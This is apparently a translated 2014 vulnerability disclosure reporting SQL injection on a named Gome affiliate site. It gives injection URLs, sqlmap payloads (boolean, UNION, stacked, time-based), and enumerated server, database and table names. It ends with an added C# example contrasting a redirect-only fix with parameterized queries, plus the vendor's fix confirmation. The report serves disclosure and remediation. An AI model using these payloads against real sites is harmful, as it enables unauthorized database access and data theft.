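2014-02-16: Details reported to the vendor; awaiting vendor handling
2014-02-24: Vendor has confirmed; details disclosed to the vendor only
2014-03-06: Details disclosed to core white hats and experts in related fields
2014-03-16: Details disclosed to ordinary white hats
2014-03-26: Details disclosed to trainee white hats
2014-04-02: Details disclosed to the public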
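SQL injection

Site: http://cps.gome.com.cn/
Injection points:
1. http://cps.gome.com.cn/Home/NoticeDetail?id=132
2. http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E id=901
The fix for the site's injection points is incomplete: it only redirects, and the key parameter being passed is left unhandled.

Taking the first injection point as an example:
Databases: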
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=132' AND 1148=1148 AND 'bVwH'='bVwH

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=-1683' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(108)+CHAR(100)+CHAR(118)+CHAR(115)+CHAR(102)+CHAR(118)+CHAR(83)+CHAR(102)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(102)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=132'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=132' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] GomeCps
[*] master
[*] model
[*] msdb
[*] tempdb
Tables in the GomeCps database:
Database: GomeCps
[46 tables]
+-------------------------+
| Accounts                |
| AdsCode                 |
| AdsCode                 |
| AdsUserSelf             |
| BackupCookies           |
| BannerAds               |
| BaseCPSOriDataEffects   |
| CPSNoEffectBanlce       |
| CPSOriDataEffect_Backup |
| CPSOriDataEffect_Backup |
| CPSOriDataOccur_Backup  |
| CPSOriDataOccur_Backup  |
| CommissionByPcd         |
| Commissions             |
| CookiesRecent           |
| Cookies_D               |
| Cookies_D               |
| CurrentSettlements      |
| EarnerInfos             |
| HelpSetUp               |
| IpReport                |
| IpReportRecent          |
| MemberType              |
| Notices                 |
| PageGroup               |
| Payments                |
| Products                |
| RecommendedAd           |
| RoleAuthority           |
| Roles                   |
| SettlementHistorys      |
| SettlementLogs          |
| ShowComTop              |
| SiteType                |
| StageCommissionLogs     |
| StageCommissionLogs     |
| Taxs                    |
| TemporaryBackupCookies  |
| Users                   |
| WebSites                |
| categorysHistory        |
| categorysHistory        |
| modules                 |
| plan                    |
| sqlmapfile              |
| sysdiagrams             |
+-------------------------+
Handle (sanitize) the parameters that are passed in.
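An added example, not code from the report or from the vendor: one plausible shape of a redirect-only fix beside a handler that validates the id and binds it as a typed parameter. The MVC controller shape, the Id/Title/Body column names and the connection string are assumptions; only the NoticeDetail endpoint and the Notices table name come from the report.

```csharp
using System.Data;
using System.Data.SqlClient;
using System.Web.Mvc;

// Added example. Controller shape, column names and connection string are assumptions.
public class HomeController : Controller
{
    private const string ConnStr = "Server=.;Database=GomeCps;Integrated Security=true"; // hypothetical

    // Incomplete fix: the visitor is redirected when nothing matches, but the raw
    // id has already been concatenated into the statement and executed.
    public ActionResult NoticeDetailRedirectOnly(string id)
    {
        var sql = "SELECT Title, Body FROM Notices WHERE Id = '" + id + "'"; // raw input in SQL text
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            using (var r = cmd.ExecuteReader())
                if (!r.Read()) return RedirectToAction("Index"); // hides output, query already ran
        }
        return View();
    }

    // Hardened: reject anything that is not a positive integer before touching the
    // database, then bind the value as a typed parameter so it is never parsed as SQL.
    public ActionResult NoticeDetail(string id)
    {
        int noticeId;
        if (!int.TryParse(id, out noticeId) || noticeId <= 0)
            return new HttpStatusCodeResult(400);

        const string sql = "SELECT Title, Body FROM Notices WHERE Id = @id";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = noticeId;
            conn.Open();
            using (var r = cmd.ExecuteReader())
            {
                if (!r.Read()) return HttpNotFound();
                ViewBag.NoticeTitle = r.GetString(0);
                ViewBag.NoticeBody = r.GetString(1);
                return View();
            }
        }
    }
}
```

The same binding applies to the second endpoint, AdsUserSelfEdit: id as SqlDbType.Int and webname as SqlDbType.NVarChar with an explicit length.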
Severity: Low
Vulnerability Rank: 5
Confirmed at: 2014-02-24 15:18
The vulnerability has been fixed. Thank you for your support.
None yet